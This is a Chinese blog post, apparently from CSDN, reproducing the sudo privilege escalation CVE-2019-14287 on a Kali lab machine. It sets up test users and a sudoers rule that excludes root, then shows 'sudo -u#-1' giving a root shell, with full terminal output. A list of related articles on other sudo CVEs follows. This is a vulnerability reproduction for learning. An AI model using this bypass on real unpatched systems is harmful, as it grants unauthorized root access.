CVE-2019-14287:sudo 权限提升漏洞

最新推荐文章于 2023-01-13 15:18:00 发布
最新推荐文章于 2023-01-13 15:18:00 发布
阅读量587 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: 漏洞复现 CVE-2019-14287 sudo
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43583637/article/details/102873391
版权

0x00 漏洞介绍

sudo本地权限提升漏洞(CVE-2019-14287),是由于sudo配置文件配置不当造成的,此漏洞可以使普通用户绕过限制以root身份执行命令

0x01 影响版本

sudo < 1.8.28

0x02 sudo作用

sudo是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具,这样不仅减少了root用户的登录 和管理时间,同样也提高了安全性

0x03 sudo权限

sudo权限控制在配置文件/etc/sudoers 中,该文件权限如下

root@kali:~# ls -al /etc/sudoers
-r--r----- 1 root root 669 Aug  7 02:58 /etc/sudoers

0x04 漏洞复现

系统平台:kali-2019.03

root@kali:~# lsb_release -a
No LSB modules are available.
Distributor ID:    Kali
Description:    Kali GNU/Linux Rolling
Release:    2019.3
Codename:    kali-rolling

sudo版本

root@kali:~# sudo -V
Sudo version 1.8.27

备份sudo配置文件

root@kali:~# cp /etc/sudoers /etc/sudoers.bak
root@kali:~# ls -al /etc/sudoers*
-r--r----- 1 root root  669 Aug  7 02:58 /etc/sudoers
-r--r----- 1 root root  669 Nov  2 15:37 /etc/sudoers.bak
/etc/sudoers.d:
total 20
drwxr-xr-x   2 root root  4096 Oct 29 17:25 .
drwxr-xr-x 163 root root 12288 Nov  2 15:37 ..
-r--r-----   1 root root   958 Aug  7 02:58 README

新建普通用户

root@kali:~# useradd test
root@kali:~# passwd test
New password:
Retype new password:
passwd: password updated successfully
root@kali:~# useradd world
root@kali:~# passwd world
New password:
Retype new password:
passwd: password updated successfully

修改sudo配置文件

#打开配置文件
visudo

在配置文件添加以下内容,允许test用户可以以所有用户的身份运行id命令

#添加内容
test ALL=(ALL)  /usr/bin/id

命令测试

root@kali:~# su - test
su: warning: cannot change directory to /home/test: No such file or directory
$ id
uid=1000(test) gid=1000(test) groups=1000(test)
$ sudo -u root id


We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:


    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.


[sudo] password for test:
uid=0(root) gid=0(root) groups=0(root)
$ sudo -u world id
uid=1001(world) gid=1001(world) groups=1001(world)
$ sudo -u root whoami
Sorry, user test is not allowed to execute '/usr/bin/whoami' as root on kali.
$ sudo -u world whoami
Sorry, user test is not allowed to execute '/usr/bin/whoami' as world on kali.
$

root@kali:~# su - test
su: warning: cannot change directory to /home/test: No such file or directory
$ sudo -u#0 id
uid=0(root) gid=0(root) groups=0(root)
$ sudo -u#1001 id
uid=1001(world) gid=1001(world) groups=1001(world)
$ sudo -u#0 whoami
Sorry, user test is not allowed to execute '/usr/bin/whoami' as root on kali.
$ sudo -u#1001 whoami
Sorry, user test is not allowed to execute '/usr/bin/whoami' as world on kali.
$

漏洞发现

root@kali:~# su - test
su: warning: cannot change directory to /home/test: No such file or directory
$ sudo -u#-1 id
uid=0(root) gid=1000(test) groups=1000(test)
$

重新配置sudo配置文件,允许test用户可以以除了root用户以外的所有用户身份执行任意的命令

test ALL=(ALL,!root) ALL

命令测试

root@kali:~# su - test
su: warning: cannot change directory to /home/test: No such file or directory
$ sudo -u test id
uid=1000(test) gid=1000(test) groups=1000(test)
$ sudo -u test whoami
test
$ sudo -u root id
Sorry, user test is not allowed to execute '/usr/bin/id' as root on kali.
$ sudo -u root whoami
Sorry, user test is not allowed to execute '/usr/bin/whoami' as root on kali.
$

漏洞触发

root@kali:~# su - test
su: warning: cannot change directory to /home/test: No such file or directory
$ sudo -u#-1 id
uid=0(root) gid=1000(test) groups=1000(test)
$ sudo -u#-1 whoami
root
$ sudo -u#-1 /bin/bash
root@kali:/root# id
uid=0(root) gid=1000(test) groups=1000(test)
root@kali:/root# whoami
root
root@kali:/root#
冠霖L
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
03 - CVE-2019-14287漏洞复现
weixin_43586169的博客
03-29 1092
一个简单的Linux系统的CVE漏洞
CVE-2019-14287漏洞与修复过程
weixin_44950652的博客
02-01 1415
CVE-2019-14287漏洞与修复过程CVE-2019-14287漏洞展示修复漏洞 CVE-2019-14287漏洞 CVE-2019-14287本地提权漏洞漏洞因为是Sudo<1.8.28,只需要升级sudo>1.8.28的就可以修复完成 展示 使用root用户修改权限文件:vim /etc/sudoers ,添加如下: chen ALL=(ALL,!root) ALL 2. 添加用户:chen, chen , Useradd chen Passwd chen 使用chen用
CVE-2019-14287sudo 权限绕过漏洞复现过程)
大方子
10-16 688
实验环境: kali 影响范围: sudo 1.8.28 之前的所有版本 复现过程 查询下sudo的版本 sudo -V 创建用户 useradd test passwd test 编辑下sudoers文件 这里添加了 test ALL=(ALL, !root) /usr/bin/vim 这里表示 test 可以 任意主机上...
linux 漏洞CVE-2019-14287CVE-2021-4034
任雪飘的博客
02-26 4909
大家好,我是任雪飘,一个刚接触web的菜鸡。我们今天一起复现一下linux老版本漏洞,普通用户利用sudo获得系统root权限操作系统! 现在我们重新创建一个新用户 给这个用户设置策略,就是不给他root权限,气死你 ceshi1 这个账号确实没有了root 权限的身份了 现在我们测试这个漏洞是不是存在 既然是root 权限了,那我们修改其他用户的密码吧!看下图是不是完美了 到此处CVE-2019-14287 漏洞复现完毕。 接下 下来我们就要去玩脚本...
Linux sudo权限绕过漏洞详解
sev777en的博客
10-15 3727
Linux sudo权限绕过漏洞详解 难得提起兴致写一篇软文,对于新曝光的Linux sudo权限绕过漏洞CVE-2019-14287做了一些研究, 各大平台都已经把核心东西亮出来了,但是目前没有发现说的特别完整的,经过一番摸索,总算 弄清楚了。 关于sudo的定义就不细说了,网上随便搜搜一大堆,这里直接进入正题。 本漏洞存在于sudo 1.8.28之前的版本,随便打开个虚拟机看看当前版本: 版...
CVE-2019-14287sudo权限绕过漏洞
Sulli的博客
10-18 243
实验环境 Kali 影响范围 sudo 1.8.28之前的所有版本 复现过程 首先看一下自身Kali的sudo版本,命令:sudo -V 符合条件,接下来需要新建一个test用户,命令:useradd test passwd test 然后vi进入sudoers,命令:vi /etc/sudoers 在root ALL=(ALL:ALL) ALL下添加test用户的配置:test ALL=(AL...
sudo-cve-2019-18634:CVE-2019-18634的概念证明
03-21
这个概念证明是关于CVE-2019-18634漏洞的,这是一次重要的安全事件,影响了广泛使用的sudo软件。 **CVE-2019-18634 描述** CVE-2019-18634 是一个严重的安全漏洞,被发现存在于sudo 1.8.2 至 1.8.23p2 版本之间。...
CVE-2019-19268:新发现0天!
04-16
CVE-2019-19268 受影响的版本:rConfig 3.9.2。 [描述] 由于配置错误,rConfig v3.9.2中存在多个攻击媒介,这允许本地用户通过sudo执行root命令。 [发现者] dmw0ng-不和谐:dmw0ng#4449 TheCyber​​Geek-不和谐...
sudo-1.9.12p1,解决cve-2022-43995
11-08
CVE-2022-43995是一个特定的漏洞,它可能允许攻击者通过特定的输入序列绕过sudo的某些安全限制,从而获得不应有的权限。这种漏洞对于系统安全构成重大威胁,因为攻击者可能利用它来执行任意代码,获取系统控制权。 ...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
漏洞复现】Linux sudo权限提升漏洞 (CVE-2021-3156)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-22 764
2021年1月26日,Linux安全工具sudo被发现严重的基于堆缓冲区溢出漏洞。利用这一漏洞,攻击者无需知道用户密码,一样可以获得root权限,并且是在默认配置下。此漏洞已分配为CVE-2021-3156,危险等级评分为7分。当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或-i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。
sudo堆缓冲区溢出提权漏洞CVE-2021-3156)
最新发布
Ryan的博客
01-13 2766
sudo堆缓冲区溢出提权漏洞CVE-2021-3156)
CVE-2019-14287复现
姜小孩的博客
11-14 3414
原理 sudo 是 Linux 系统中的一个指令,也可以把他理解成一个软件,他可以 更快捷的使用其他用户的权限去完成某些需要高权限用户才能执行 的操作。 环境搭建 1.先用sudu -V查看版本,此漏洞是Linux的1.8.28版本之前的漏洞 添加一个新用户 修改sudo配置文件 vim /etc/sudoers 当在 sudo 的配置文件中添加了如下这条 Test ALL=(ALL,!root) ALL 就会触发 此条配置的意思是指:
Linux sudo权限提升漏洞CVE-2021-3156)复现
锋刃科技的博客
01-30 4070
漏洞概述 1月26日,Sudo发布安全通告,修复了一个类Unix操作系统在命令参数中转义反斜杠时存在基于堆的缓冲区溢出漏洞。当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或-i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。只要存在sudoers文件(通常是/etc/sudoers),攻击者就可以使用本地普通用户利用sudo获得系统root权限。请受影响的用户尽快采取措施进行防护。 影响版本 ...
linux下hg无法运行_Linux sudo 漏洞可能导致未经授权的特权访问 | Linux 中国
weixin_39703773的博客
11-28 29
sudo 命令中最近发现了一个严重漏洞,如果被利用,普通用户可以 root 身份运行命令,即使在 /etc/sudoers 文件中明确禁止了该用户这样做。将 sudo 更新到版本 1.8.28 应该可以解决该问题,因此建议 Linux 管理员尽快这样做。如何利用此漏洞取决于 /etc/sudoers 中授予的特定权限。例如,一条规则允许用户以除了 root 用户之外的任何用户身份来编辑文件,这实际...
linux 列目录漏洞,Linux sudo漏洞CVE-2017-1000367)复现和利用思路分析
weixin_35618196的博客
05-05 832
* 本文作者:李丽,本文属FreeBuf原创奖励计划,未经许可禁止转载漏洞背景在今年5.30日linux sudo被爆出存在安全漏洞sudo版本是1.8.20以及之前的版本都有可能会受到漏洞的影响,在开启selinux的情况和普通用户在sudoer者中,可以使普通用户造成覆盖任意文件,造成权限提升漏洞分析出现漏洞主要在sudo中的/src/ttyname.c中的char *get_procc...
Linux sudo权限提升漏洞复现
LuckySec
03-24 309
0x01 漏洞简介 2021年1月26日,Sudo发布安全通告,修复了一个类Unix操作系统在命令参数中转义反斜杠时存在基于堆的缓冲区溢出漏洞。当sudo通过 -s 或 -i 命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用 -s 或 -i 标志运行 sudoedit 时,实际上并未进行转义,从而可能导致缓冲区溢出。因此只要存在sudoers文件(通常是 /etc/sudoers),攻击者就可以使用本地普通用户利用sudo获得系统root权限。目前漏洞细节已公开,请受影

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值